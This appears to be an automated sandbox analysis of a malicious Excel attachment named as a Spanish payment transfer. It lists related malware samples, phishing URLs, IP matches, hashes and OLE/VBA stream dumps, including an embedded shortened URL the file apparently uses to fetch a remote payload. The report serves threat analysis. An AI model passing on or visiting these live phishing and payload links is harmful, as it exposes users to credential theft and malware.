                  s-part-0012.t-0009.t-msedge.net92.255.85.2.exeGet hashmaliciousXWormBrowse
                  • 13.107.246.40
                  EwZAaQu0yXKbde7.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                  • 13.107.246.40
                  https://teddyslimo.comGet hashmaliciousHTMLPhisherBrowse
                  • 13.107.246.40
                  https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comGet hashmaliciousHTMLPhisherBrowse
                  • 13.107.246.40
                  Play Voicemail Transcription. (387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                  • 13.107.246.40
                  https://business.peppercontent.io/items/1EeoNExLmk9Get hashmaliciousUnknownBrowse
                  • 13.107.246.40
                  TRANS_ADV_9290910137_.svgGet hashmaliciousHTMLPhisherBrowse
                  • 13.107.246.40
                  EFT Remittance_(Bobd)CQDM.htmGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                  • 13.107.246.40
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.40
                  PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.40
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  EKSENBILISIMTRi686.elfGet hashmaliciousUnknownBrowse
                  • 212.60.30.63
                  na.elfGet hashmaliciousUnknownBrowse
                  • 147.79.124.110
                  http://elcharrousa.comGet hashmaliciousUnknownBrowse
                  • 147.79.123.22
                  El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                  • 45.143.99.2
                  0YyNtXEF7a.pdfGet hashmaliciousUnknownBrowse
                  • 45.143.99.2
                  C74uZ7KpVc.pdfGet hashmaliciousUnknownBrowse
                  • 45.143.99.2
                  4.elfGet hashmaliciousUnknownBrowse
                  • 45.92.107.109
                  https://lsscleancom-my.sharepoint.com/:f:/g/personal/kenlo_lssclean_com/EhnR6xetq2dAuMrc9U21jwcBJzCdAGjvCuP0qUViMdaBIQ?e=0YIDjA__;!!Dhw9WWooB8bE!tAdRWoDVFYP2IeTWlIzG7WWn-9rmQ8Bcj1TAwSQFkHEKEKRRtghV6HUuVp2qt0crTG1LxmWitv2uFE_jVwUp17lshg$Get hashmaliciousGabagoolBrowse
                  • 147.79.74.176
                  https://toeaba.fk51.fdske.com/e/c/01jj4zj6bgfw7v8h5pn7k230zs/01jj4zj6bgfw7v8h5pn9dhfjstGet hashmaliciousUnknownBrowse
                  • 147.79.74.176
                  Entertainment technology partners- January 16, 2025 stmt eAOx0Jy8v6VOSjVj58966wHa1.docxGet hashmaliciousGabagoolBrowse
                  • 147.79.74.176
                  AS-COLOCROSSINGUSNew Order 234600232.exeGet hashmaliciousXWormBrowse
                  • 192.3.101.149
                  znicegreatveryspecialguestyourareforme.htaGet hashmaliciousRemcosBrowse
                  • 104.168.7.32
                  local.jarGet hashmaliciousUnknownBrowse
                  • 192.3.109.140
                  local.jarGet hashmaliciousUnknownBrowse
                  • 192.3.109.140
                  Ec0AgD2t1q.exeGet hashmaliciousDarkVision RatBrowse
                  • 104.168.28.10
                  ENQ#U007esr127.exeGet hashmaliciousDBatLoader, RemcosBrowse
                  • 107.173.177.152
                  SecuriteInfo.com.Win64.MalwareX-gen.16198.19724.exeGet hashmaliciousUnknownBrowse
                  • 104.168.28.10
                  SecuriteInfo.com.Win64.MalwareX-gen.27094.13920.exeGet hashmaliciousUnknownBrowse
                  • 104.168.28.10
                  SecuriteInfo.com.Win64.MalwareX-gen.16198.19724.exeGet hashmaliciousUnknownBrowse
                  • 104.168.28.10
                  SecuriteInfo.com.Win64.MalwareX-gen.27094.13920.exeGet hashmaliciousUnknownBrowse
                  • 104.168.28.10
                  MICROSOFT-CORP-MSN-AS-BLOCKUShttps://energy-innovation-4916.my.salesforce-sites.com/enrGet hashmaliciousHTMLPhisherBrowse
                  • 13.107.42.14
                  CV RESUME.exeGet hashmaliciousFormBookBrowse
                  • 20.2.217.253
                  G3b6ylc4ml.exeGet hashmaliciousVidarBrowse
                  • 204.79.197.203
                  N47SyCplyy.exeGet hashmaliciousVidarBrowse
                  • 204.79.197.203
                  https://usg02.safelinks.protection.office365.us/?url=https%3A%2F%2Flinks.daily.investingskeeper.com%2Ftrack%3Fuid%3Da3279f8b-b292-438c-a320-cc20f4c87589%26txnid%3D4d4792a7-4bc3-4505-978b-f209450cd9a8%26eid%3D4c4e8593-ace9-4767-8b41-8513ad597438%26mid%3D3362ae60-588c-49ab-b09c-80f1ed79d17b%26bsft_ek%3D2025-03-24T22%253A00%253A12Z%26bsft_mime_type%3Dhtml%26bsft_tv%3D198%26bsft_lx%3D6%26bsft_aaid%3Da1f6e90e-30b3-4e74-bc2b-d28e46c02c74%26a%3Dclick%26redir%3Dhttps%253A%252F%252Fclick.tracking.investingskeeper.com%252F67c9843e0f3b707c79a6b65c%253Femail%253Dlinden.blue%252540ga.com%2526domain%253D035IK%2526type%253DB%2526product%253DAYGT3JS2%2526utm_campaign%253Dik_r-24-3-aygt3js2-yahoo_all%2526utm_source%253Dblueshift%2526utm_medium%253Demail%2526utm_content%253Dik_r-template-2&data=05%7C02%7Clinden.blue%40ga.com%7Cb400af556efd4c2a03ac08dd6b24dfdb%7C05e53887e4b3459587f73ae79f0e723e%7C0%7C0%7C638784528308949376%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=tjEqsrgVwLWIuwClGr3H%2FpLKdZ7vzNH6qyW1ZOS1SBA%3D&reserved=0Get hashmaliciousHTMLPhisherBrowse
                  • 23.103.208.28
                  EwZAaQu0yXKbde7.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWormBrowse
                  • 13.107.246.38
                  https://teddyslimo.comGet hashmaliciousHTMLPhisherBrowse
                  • 52.152.143.207
                  https://thetti-my.sharepoint.com/:f:/p/kellieblack/EtssBivICL5BgQEDfbETZP4BZsoHTOyxYMnSj46dgeiAiA?e=0t2fdmGet hashmaliciousHTMLPhisherBrowse
                  • 52.98.71.210
                  file.exeGet hashmaliciousVidarBrowse
                  • 204.79.197.203
                  https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.comGet hashmaliciousHTMLPhisherBrowse
                  • 52.179.73.57
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  6271f898ce5be7dd52b0fc260d0662b3PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                  • 147.79.86.93
                  a0e9f5d64349fb13191bc781f81f42e1Payment Advice 24-03-2025.docxGet hashmaliciousUnknownBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousCryptOne, LummaC Stealer, Socks5SystemzBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 13.107.246.40
                  file.exeGet hashmaliciousLummaC StealerBrowse
                  • 13.107.246.40
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.40
                  PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 13.107.246.40
                  No context
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):118
                  Entropy (8bit):3.5700810731231707
                  Encrypted:false
                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                  MD5:573220372DA4ED487441611079B623CD
                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):784
                  Entropy (8bit):2.7137690747287806
                  Encrypted:false
                  SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                  MD5:09F73B3902CD3D88E04312787956B654
                  SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                  SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                  SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.7769794087092887
                  Encrypted:false
                  SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                  MD5:37BD8218D560948827D3B948CAFA579C
                  SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                  SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                  SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                  Malicious:true
                  Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Mar 25 17:36:20 2025, Security: 1
                  Entropy (8bit):7.9821744334496545
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:Transferencia de pago.xla.xlsx
                  File size:1'263'104 bytes
                  MD5:e2fa9ae74472cc7853c57c2e01e5ca78
                  SHA1:4f3c924772d7ed5767bcd13b2969ea98204ac146
                  SHA256:43c68b7dd1c862d41e95e3db196a0d2005df40d3f19c3ae0b580cc21863ea81d
                  SHA512:e0846233d1e0e5a6387942ed500c207075f71a930f40b3b6cfa0aebcbef6813025717cb9bd5b78134d89c485af1607c435fe85852bfd944aa6893f867ce0f070
                  SSDEEP:24576:Qk/BbDqMApAUspxvqbY43WZHzn0M9cWNVDfrsnlbhSpAF:QcRwEpxybY43WF0MtDDTMN4pAF
                  TLSH:034533A4BB80DA73C9B244BC459BCA998425FC407799C7633249B34E39317B1829F6CF
                  File Content Preview:........................>...................................v...................................................................................y.......{......................................................................................................
                  Icon Hash:35e58a8c0c8a85b9
                  Document Type:OLE
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Code Page:1252
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2025-03-25 17:36:20
                  Creating Application:Microsoft Excel
                  Security:1
                  Document Code Page:1252
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                  VBA File Name:Sheet1.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 82 ec 0b 30 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet1"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                  VBA File Name:Sheet2.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 82 ec 20 0f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet2"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                  VBA File Name:Sheet3.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 82 ec b4 45 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet3"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:985
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w a . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 82 ec 77 61 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "ThisWorkbook"
                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:244
                  Entropy:2.889430592781307
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:200
                  Entropy:3.244124755015799
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . p k . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                  General
                  Stream Path:MBD00BF1C45/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:99
                  Entropy:3.631242196770981
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD00BF1C45/Package
                  CLSID:
                  File Type:Microsoft Excel 2007+
                  Stream Size:1099178
                  Entropy:7.995128594036676
                  Base64 Encoded:True
                  Data ASCII:P K . . . . . . . . . . ! . w 1 . . . . j . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 77 31 d5 0e e3 01 00 00 6a 08 00 00 13 00 cd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD00BF1C46/\x1Ole
                  CLSID:
                  File Type:data
                  Stream Size:624
                  Entropy:5.516470831366188
                  Base64 Encoded:False
                  Data ASCII:. . . . % { I R . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . a . g . r . . . m . y . / . K . K . h . F . 4 . w . ? . & . i . n . s . o . l . e . n . c . e . = . n . a . u . s . e . a . t . i . n . g . & . p . r . e . s . i . d . e . n . t . . . . ) _ D . . _ O . . ? S . . , > $ . 5 . . J . . , 7 | . 1 ~ . . $ . . . J p & n e . w . x O ^ 7 . r . V 2 B . - D . . ? . e _ R ~ . W S . 7 ' [ ) . $ i - . l _ m . . ( | C c . Y h . . . . . . . . . . . . . . . . . . . . 1 . G .
                  Data Raw:01 00 00 02 9f 25 ab 7b a6 a9 49 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 0a 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 67 00 72 00 2e 00 6d 00 79 00 2f 00 4b 00 4b 00 68 00 46 00 34 00 77 00 3f 00 26 00 69 00 6e 00 73 00 6f 00 6c 00 65 00 6e 00 63 00 65 00 3d 00 6e 00 61 00 75 00 73 00 65 00 61 00 74 00
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:139413
                  Entropy:7.99483810742049
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . } . . . / O H I . . S : % j . Z e . . M . . . . . . . . . . . 7 . . . \\ . p . . T . . . . o . z l . > | \\ u u z H O . i w S . e E . C ) . U ' q P . . . t . . S o r N 1 3 . . A j . . . 2 . ^ 5 B . . . E a . . . m . . . = . . . o . Q . . . o u ; . . 4 b ] . . . C . . . . L 4 . . . . Q t . . . . k . . . . . . . . = . . . . . . 8 . . x 4 . [ @ . . . ) . . . . I " . . . z . . . . Y . . . r . . . 1 . . . 1 < H 9 ( E Q < . . 2 1 . . l 1 . * W i t 1 . . . (
